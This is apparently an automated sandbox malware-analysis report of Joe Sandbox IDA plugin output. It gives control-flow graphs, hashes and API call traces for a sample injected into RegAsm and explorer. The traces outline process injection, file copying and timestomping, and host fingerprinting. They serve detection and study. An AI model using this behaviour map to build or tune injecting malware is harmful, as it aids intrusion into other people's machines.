                                    • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                    • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                                    • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                    • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 292 4018c2-40190b call 401164 Sleep call 4013cc 304 40191a-401920 292->304 305 40190d-401915 call 4014bf 292->305 308 401931 304->308 309 401928-40192d 304->309 305->304 308->309 310 401934-40194f 308->310 309->310 315 401952-40195b call 401164 310->315 316 401948-40194b 310->316 316->315
                                    APIs
                                    • Sleep.KERNELBASE(00001388), ref: 004018F6
                                      • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                      • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: CreateDuplicateObjectSectionSleep
                                    • String ID:
                                    • API String ID: 4152845823-0
                                    • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                    • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                                    • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                    • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 319 4018da-40190b call 401164 Sleep call 4013cc 326 40191a-401920 319->326 327 40190d-401915 call 4014bf 319->327 330 401931 326->330 331 401928-40192d 326->331 327->326 330->331 332 401934-40194f 330->332 331->332 337 401952-40195b call 401164 332->337 338 401948-40194b 332->338 338->337
                                    APIs
                                    • Sleep.KERNELBASE(00001388), ref: 004018F6
                                      • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                      • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: CreateDuplicateObjectSectionSleep
                                    • String ID:
                                    • API String ID: 4152845823-0
                                    • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                    • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
                                    • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                    • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0fe08d82bbc0733fee536b88697db440c6f8007bf0fae6d458775501e88f8df0
                                    • Instruction ID: 2f453a045cfb1262b63684dd565d865ec58c8b50d5cef27b8d671295e507c2b2
                                    • Opcode Fuzzy Hash: 0fe08d82bbc0733fee536b88697db440c6f8007bf0fae6d458775501e88f8df0
                                    • Instruction Fuzzy Hash: 3D41242100ABD54FC7138F30497619A7F74FE53321B1940EFD880AB2A3C6399B56C7AA
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                    • Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
                                    • Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                    • Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                    • Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
                                    • Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                    • Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                    • Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
                                    • Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                    • Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                    • Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
                                    • Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                    • Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                    • Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
                                    • Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                    • Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                    • Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
                                    • Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                    • Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                    • Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
                                    • Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                    • Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

                                    Execution Graph

                                    Execution Coverage:57.7%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:10.9%
                                    Total number of Nodes:156
                                    Total number of Limit Nodes:9
                                    execution_graph 1128 3f11951 1131 3f11980 1128->1131 1141 3f119d0 1131->1141 1134 3f11973 1135 3f1199b SleepEx 1135->1135 1136 3f119ab 1135->1136 1149 3f121c4 1136->1149 1142 3f11a07 1141->1142 1143 3f11ad0 RtlCreateHeap 1142->1143 1148 3f11992 1142->1148 1145 3f11b01 1143->1145 1144 3f11b0c LoadLibraryA 1144->1145 1144->1148 1145->1144 1146 3f11b3b 1145->1146 1147 3f11c80 CreateThread CloseHandle CreateThread 1146->1147 1146->1148 1147->1148 1167 3f13cd0 1147->1167 1170 3f13bf4 1147->1170 1148->1134 1148->1135 1150 3f121e2 1149->1150 1178 3f14a40 1150->1178 1152 3f119c0 1153 3f11d8c 1152->1153 1184 3f14c90 1153->1184 1155 3f11dc7 1156 3f11df8 CreateMutexExA 1155->1156 1157 3f11e12 1156->1157 1190 3f14e00 1157->1190 1159 3f11e51 1199 3f11f04 1159->1199 1164 3f11ebe 1165 3f11ee9 SleepEx 1164->1165 1211 3f1226c 1164->1211 1217 3f12cd0 1164->1217 1165->1164 1165->1165 1168 3f13ce2 EnumWindows SleepEx 1167->1168 1169 3f13d06 1167->1169 1168->1168 1168->1169 1171 3f13c11 CreateToolhelp32Snapshot 1170->1171 1172 3f13cab 1170->1172 1173 3f13c93 SleepEx 1171->1173 1174 3f13c25 Process32First 1171->1174 1173->1171 1173->1172 1176 3f13c3d 1174->1176 1175 3f13c8a CloseHandle 1175->1173 1176->1175 1177 3f13c78 Process32Next 1176->1177 1177->1176 1179 3f14a69 1178->1179 1180 3f14a7d GetTokenInformation 1179->1180 1183 3f14ada 1179->1183 1181 3f14aa8 1180->1181 1182 3f14ab2 GetTokenInformation 1181->1182 1182->1183 1183->1152 1185 3f14cbd GetVolumeInformationA 1184->1185 1187 3f14d10 1185->1187 1225 3f15174 CryptAcquireContextA 1187->1225 1189 3f14d50 1189->1155 1227 3f14f1c 1190->1227 1192 3f14e22 RegOpenKeyExA 1193 3f14ed3 1192->1193 1196 3f14e4f 1192->1196 1194 3f14ede ObtainUserAgentString 1193->1194 1194->1159 1195 3f14e63 RegQueryValueExA 1195->1196 1196->1195 1197 3f14ec9 RegCloseKey 1196->1197 1198 3f14eb6 1196->1198 1197->1193 1198->1197 1201 3f11f27 1199->1201 1200 3f11e7d CreateFileMappingA 1200->1164 1201->1200 1202 3f1203e 1201->1202 1203 3f11f8b DeleteFileW CopyFileW 1201->1203 1229 3f13490 1202->1229 1203->1200 1204 3f11fab DeleteFileW 1203->1204 1207 3f11fc1 1204->1207 1206 3f1205b CreateFileW 1206->1200 1208 3f11ff6 DeleteFileW 1207->1208 1209 3f1200a 1208->1209 1235 3f14920 1209->1235 1212 3f1229d 1211->1212 1242 3f132ec CreateFileW 1212->1242 1214 3f122b2 1248 3f1230c 1214->1248 1216 3f122c3 1216->1164 1218 3f132ec 3 API calls 1217->1218 1223 3f12cf3 1218->1223 1219 3f12f55 1219->1164 1220 3f12f34 SleepEx 1220->1219 1220->1223 1223->1219 1223->1220 1224 3f12efa ResumeThread 1223->1224 1287 3f14578 1223->1287 1291 3f12fac 1223->1291 1224->1223 1226 3f151b9 1225->1226 1226->1189 1228 3f14f4c 1227->1228 1228->1192 1230 3f134b1 1229->1230 1231 3f134d1 GetUserNameW 1230->1231 1232 3f134f2 1231->1232 1240 3f135e8 CoCreateInstance 1232->1240 1234 3f1350d 1234->1206 1236 3f14947 1235->1236 1237 3f14967 SetFileAttributesW CreateFileW 1236->1237 1238 3f149b2 SetFileTime 1237->1238 1239 3f149d3 1238->1239 1239->1202 1241 3f13646 1240->1241 1243 3f13341 1242->1243 1246 3f133b5 1242->1246 1244 3f133ac CloseHandle 1243->1244 1245 3f13360 ReadFile 1243->1245 1244->1246 1247 3f1338f 1245->1247 1246->1214 1247->1244 1271 3f13de0 1248->1271 1250 3f125b8 1253 3f126f9 1250->1253 1262 3f12657 1250->1262 1267 3f125d0 1250->1267 1251 3f1279d 1252 3f13de0 2 API calls 1251->1252 1256 3f127c4 1252->1256 1255 3f13de0 2 API calls 1253->1255 1254 3f1235f 1257 3f124df DeleteFileW CreateFileW 1254->1257 1265 3f126b8 1254->1265 1270 3f12594 1254->1270 1259 3f12720 1255->1259 1258 3f12840 2 API calls 1256->1258 1256->1265 1264 3f12522 1257->1264 1257->1270 1258->1265 1260 3f12840 2 API calls 1259->1260 1259->1265 1260->1265 1261 3f13de0 2 API calls 1261->1267 1263 3f13de0 2 API calls 1262->1263 1262->1265 1263->1265 1266 3f1255b WriteFile CloseHandle 1264->1266 1265->1216 1268 3f14920 3 API calls 1266->1268 1267->1261 1267->1262 1267->1265 1275 3f12840 1267->1275 1268->1270 1270->1250 1270->1251 1272 3f13e0f 1271->1272 1281 3f13f7c 1272->1281 1274 3f13f2f 1274->1254 1276 3f12849 1275->1276 1278 3f12c63 1275->1278 1277 3f13f7c 2 API calls 1276->1277 1280 3f12948 1276->1280 1277->1280 1278->1267 1279 3f13de0 2 API calls 1279->1278 1280->1278 1280->1279 1282 3f13fbf 1281->1282 1283 3f13fc6 1281->1283 1283->1282 1284 3f14276 RtlAllocateHeap 1283->1284 1285 3f142a3 1284->1285 1285->1282 1286 3f142af RtlReAllocateHeap 1285->1286 1286->1285 1288 3f145a8 1287->1288 1289 3f1461c CreateProcessInternalW 1288->1289 1290 3f1466f 1289->1290 1290->1223 1292 3f12fe3 1291->1292 1293 3f132c2 1292->1293 1311 3f14760 1292->1311 1296 3f14760 NtCreateSection 1297 3f1305b 1296->1297 1297->1293 1298 3f14760 NtCreateSection 1297->1298 1299 3f1308a 1298->1299 1300 3f14760 NtCreateSection 1299->1300 1301 3f130da 1300->1301 1302 3f131b8 NtQueryInformationProcess 1301->1302 1303 3f13198 NtQueryInformationProcess 1301->1303 1304 3f131df 1302->1304 1303->1304 1305 3f131e7 ReadProcessMemory 1304->1305 1306 3f132ae CloseHandle 1304->1306 1315 3f15328 1305->1315 1306->1293 1308 3f13212 ReadProcessMemory 1309 3f13236 1308->1309 1310 3f1329f WriteProcessMemory 1309->1310 1310->1306 1312 3f14793 1311->1312 1314 3f1302b 1311->1314 1313 3f147b1 NtCreateSection 1312->1313 1312->1314 1313->1314 1314->1296

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_03F11175 1 Function_03F13BF4 37 Function_03F150B0 1->37 50 Function_03F14714 1->50 2 Function_03F15174 3 Function_03F15274 4 Function_03F113F4 5 Function_03F14578 35 Function_03F152CC 5->35 46 Function_03F15328 5->46 52 Function_03F14F1C 5->52 6 Function_03F13F7C 6->3 15 Function_03F15368 6->15 29 Function_03F143C0 6->29 33 Function_03F14FC8 6->33 6->35 40 Function_03F14434 6->40 6->46 6->52 59 Function_03F15384 6->59 7 Function_03F1177C 8 Function_03F149FC 9 Function_03F14760 25 Function_03F153D8 9->25 10 Function_03F13DE0 10->6 10->35 39 Function_03F148B0 10->39 10->46 10->59 11 Function_03F14860 12 Function_03F11062 13 Function_03F14BE4 14 Function_03F135E8 14->35 14->52 16 Function_03F132EC 16->33 16->35 16->46 16->52 17 Function_03F117EC 18 Function_03F1226C 18->16 18->35 62 Function_03F1230C 18->62 19 Function_03F11951 55 Function_03F11980 19->55 20 Function_03F119D0 20->1 21 Function_03F13CD0 20->21 20->35 20->52 53 Function_03F14B1C 20->53 60 Function_03F11D08 20->60 22 Function_03F12CD0 22->5 22->16 22->33 22->35 22->46 47 Function_03F12FAC 22->47 63 Function_03F14D8C 22->63 23 Function_03F111D4 23->4 24 Function_03F11456 26 Function_03F150DC 27 Function_03F139DC 34 Function_03F15348 27->34 51 Function_03F13A94 27->51 28 Function_03F14A40 28->25 28->35 28->46 29->46 29->59 30 Function_03F12840 30->6 30->10 30->26 30->27 30->33 30->34 30->35 30->46 30->52 31 Function_03F11045 32 Function_03F121C4 32->28 36 Function_03F1354C 36->35 36->46 36->52 38 Function_03F153B0 39->59 41 Function_03F11938 42 Function_03F14920 42->35 42->46 43 Function_03F146A0 43->50 44 Function_03F13D20 44->25 44->37 44->50 45 Function_03F16229 47->9 47->11 47->33 47->35 47->46 47->51 48 Function_03F14C90 48->2 48->35 48->46 48->52 49 Function_03F13490 49->14 49->35 49->36 49->46 52->33 52->46 53->13 53->37 54 Function_03F11501 55->20 55->32 61 Function_03F11D8C 55->61 56 Function_03F14E00 56->26 56->35 56->52 57 Function_03F11803 58 Function_03F11F04 58->35 58->42 58->46 58->49 58->52 58->63 60->53 61->3 61->18 61->22 61->35 61->38 61->46 61->48 61->52 61->56 61->58 62->10 62->15 62->26 62->30 62->33 62->34 62->35 62->42 62->43 62->52 63->33 63->46

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 03F14760: NtCreateSection.NTDLL ref: 03F147D2
                                    • NtQueryInformationProcess.NTDLL ref: 03F131A2
                                    • NtQueryInformationProcess.NTDLL ref: 03F131CA
                                    • ReadProcessMemory.KERNEL32 ref: 03F131FD
                                    • ReadProcessMemory.KERNEL32 ref: 03F1322B
                                    • WriteProcessMemory.KERNEL32 ref: 03F132A8
                                    • CloseHandle.KERNEL32 ref: 03F132B2
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Memory$InformationQueryRead$CloseCreateHandleSectionWrite
                                    • String ID:
                                    • API String ID: 1020863039-0
                                    • Opcode ID: ced1f2898f7eb252e1f43db851a68953a6748b76824115949939d79610a37397
                                    • Instruction ID: 9292b3bb6a1c4636e74ffd062736edcdc90ac9edfe56d359946f7526a0c55a06
                                    • Opcode Fuzzy Hash: ced1f2898f7eb252e1f43db851a68953a6748b76824115949939d79610a37397
                                    • Instruction Fuzzy Hash: 52B18331A18A4D8FDB18EF58E8456A9B3F1FB98310F04427ED84AE7245DB30E9068BC5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 245 3f13bf4-3f13c0b 246 3f13c11-3f13c23 CreateToolhelp32Snapshot 245->246 247 3f13cab-3f13cc4 245->247 248 3f13c93-3f13ca5 SleepEx 246->248 249 3f13c25-3f13c3b Process32First 246->249 248->246 248->247 250 3f13c86-3f13c88 249->250 251 3f13c8a-3f13c8d CloseHandle 250->251 252 3f13c3d-3f13c54 call 3f150b0 250->252 251->248 255 3f13c56-3f13c58 252->255 256 3f13c5a-3f13c68 255->256 257 3f13c6c-3f13c73 call 3f14714 255->257 256->255 258 3f13c6a 256->258 260 3f13c78-3f13c80 Process32Next 257->260 258->260 260->250
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 2482764027-0
                                    • Opcode ID: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                    • Instruction ID: c7fd90532a171c4feced2e23eb0c3d6f1dd7d753bdcac81000c548d6a21fdb10
                                    • Opcode Fuzzy Hash: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                    • Instruction Fuzzy Hash: C0210634218A098FDB18EF64D4887AAB3E2FB88315F080B7FD44FDE194DB3495558711

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 283 3f14760-3f1478d 284 3f14793-3f147ab call 3f153d8 283->284 285 3f1483b-3f1483c 283->285 289 3f147b1-3f147db NtCreateSection 284->289 290 3f14832-3f14835 284->290 287 3f1483e-3f14857 285->287 291 3f14825-3f14827 289->291 292 3f147dd-3f147df 289->292 293 3f14837-3f14838 290->293 294 3f14829-3f14830 290->294 291->293 291->294 292->293 295 3f147e1-3f147e5 292->295 293->285 296 3f147e7-3f1481d 294->296 295->296 296->293 298 3f1481f-3f14823 296->298 298->287
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateSection
                                    • String ID: @$@
                                    • API String ID: 2449625523-149943524
                                    • Opcode ID: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                    • Instruction ID: c014e48e48b93a65ec01f8ff7f9abe874cdc057433367bbb6b28298471b3ec4f
                                    • Opcode Fuzzy Hash: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                    • Instruction Fuzzy Hash: 98319FB0908B498FCB94EF59D88466ABBF4FB98315F14066FE85EE3251DB70D850CB81

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 371 3f15174-3f151b3 CryptAcquireContextA 372 3f15256-3f1526a 371->372 373 3f151b9-3f1521b 371->373 378 3f1521e-3f1523e 373->378 380 3f15240-3f1524e 378->380 380->372
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32 ref: 03F151A9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AcquireContextCrypt
                                    • String ID: %02X
                                    • API String ID: 3951991833-436463671
                                    • Opcode ID: 9ba93dbf62791bb373f1cafe5aeeec9cbd4ebde5fda2e8a6a364b32c22fd26f9
                                    • Instruction ID: 992cf50a30bd94c69e7073c932513f4cfb285e922a6f938df6eaf8e2ea4c4b1d
                                    • Opcode Fuzzy Hash: 9ba93dbf62791bb373f1cafe5aeeec9cbd4ebde5fda2e8a6a364b32c22fd26f9
                                    • Instruction Fuzzy Hash: ED317C31618A4D8FCF58EF68D8886EEBBA1FB98301F000279E84EE7245DF3495419B91
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateInstance
                                    • String ID:
                                    • API String ID: 542301482-0
                                    • Opcode ID: 912310a61534bef4225d9dc8498ab8993ba0d53d59a1aa5f0c9a14fc2feab9a8
                                    • Instruction ID: c45bd0bc3677b9cadf9185765f02e8b015b1fe27939f236e861581cd8160efad
                                    • Opcode Fuzzy Hash: 912310a61534bef4225d9dc8498ab8993ba0d53d59a1aa5f0c9a14fc2feab9a8
                                    • Instruction Fuzzy Hash: 90E1EB34608A4C8FCF94EF28C895EA9B7F1FFA9305F114699E44ACB265DB70E944CB41
                                    APIs
                                    • GetUserNameW.ADVAPI32 ref: 03F134E4
                                      • Part of subcall function 03F135E8: CoCreateInstance.OLE32 ref: 03F13635
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateInstanceNameUser
                                    • String ID:
                                    • API String ID: 3213660374-0
                                    • Opcode ID: 9327133389d0eb1504d000c94c78cd777d249fb08f7bf16cb56fdbf05d64b918
                                    • Instruction ID: 8915a9456cbc243953612327ba1d13c5905683269e44f411bf0af479e761d6f8
                                    • Opcode Fuzzy Hash: 9327133389d0eb1504d000c94c78cd777d249fb08f7bf16cb56fdbf05d64b918
                                    • Instruction Fuzzy Hash: C7114834718B4C4FCB90EF6CA41876EB6E2FBDC200F400A2EA84EC7259DA7889558781

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$Thread$CloseHandleHeapLibraryLoad
                                    • String ID: %g?$iP+
                                    • API String ID: 2806579993-765743493
                                    • Opcode ID: 1abdb3b54502f18c616fd6fbb0d7aa9f562b9488b5c80a3bb4ecde1b27b04ded
                                    • Instruction ID: 6c92725b2c4389b2df4c090a59db9d74be88433d18f46d53e95e8f56bf58c0dd
                                    • Opcode Fuzzy Hash: 1abdb3b54502f18c616fd6fbb0d7aa9f562b9488b5c80a3bb4ecde1b27b04ded
                                    • Instruction Fuzzy Hash: 5791C730618E0A8FCF54EF19EC826E573D6FB98301B48017D9D4ECB156DA34D961DB92

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 101 3f1230c-3f12369 call 3f13de0 104 3f12817 101->104 105 3f1236f-3f12374 101->105 107 3f1281d-3f12837 104->107 105->104 106 3f1237a-3f1237d 105->106 106->104 108 3f12383-3f1238e 106->108 109 3f12394-3f123c7 call 3f14fc8 108->109 110 3f12807-3f1280d call 3f15348 108->110 109->110 116 3f123cd-3f123f2 call 3f14f1c call 3f150dc 109->116 113 3f12812-3f12815 110->113 113->104 113->107 121 3f123f4-3f1240e 116->121 122 3f1241d 116->122 121->122 126 3f12410-3f1241b 121->126 123 3f12422-3f1243b call 3f150dc 122->123 128 3f12441-3f12454 123->128 129 3f125aa-3f125b2 123->129 126->123 132 3f124a6-3f124a8 128->132 133 3f12456-3f1249d 128->133 130 3f125b8-3f125bc 129->130 131 3f1279d-3f127ca call 3f13de0 129->131 135 3f125c2-3f125ca 130->135 136 3f12664-3f126f4 call 3f146a0 call 3f13444 call 3f13de0 call 3f15348 130->136 144 3f127cc-3f127d3 131->144 145 3f127ff-3f12805 131->145 132->129 134 3f124ae-3f12520 call 3f15368 DeleteFileW CreateFileW 132->134 133->132 161 3f12522-3f1258f call 3f14f1c call 3f14fc8 WriteFile CloseHandle call 3f14920 134->161 162 3f1259f-3f125a5 call 3f15348 134->162 140 3f125d0-3f125dd 135->140 141 3f126f9-3f12726 call 3f13de0 135->141 136->110 140->145 155 3f125e3-3f125e6 140->155 141->145 157 3f1272c-3f12733 141->157 144->145 150 3f127d5-3f127d8 144->150 145->110 150->145 153 3f127da-3f127fa call 3f12840 call 3f15348 150->153 153->145 155->145 163 3f125ec-3f125f0 155->163 157->145 158 3f12739-3f1273c 157->158 158->145 164 3f12742-3f1279b call 3f12840 call 3f146a0 call 3f15348 158->164 196 3f12594-3f1259a call 3f152cc 161->196 162->129 168 3f125f2-3f1261f call 3f13de0 163->168 169 3f12657-3f1265e 163->169 164->145 179 3f12651-3f12655 168->179 180 3f12621-3f12628 168->180 169->136 169->145 179->168 179->169 180->179 184 3f1262a-3f1262d 180->184 184->179 189 3f1262f-3f1264c call 3f12840 call 3f15348 184->189 189->179 196->162
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
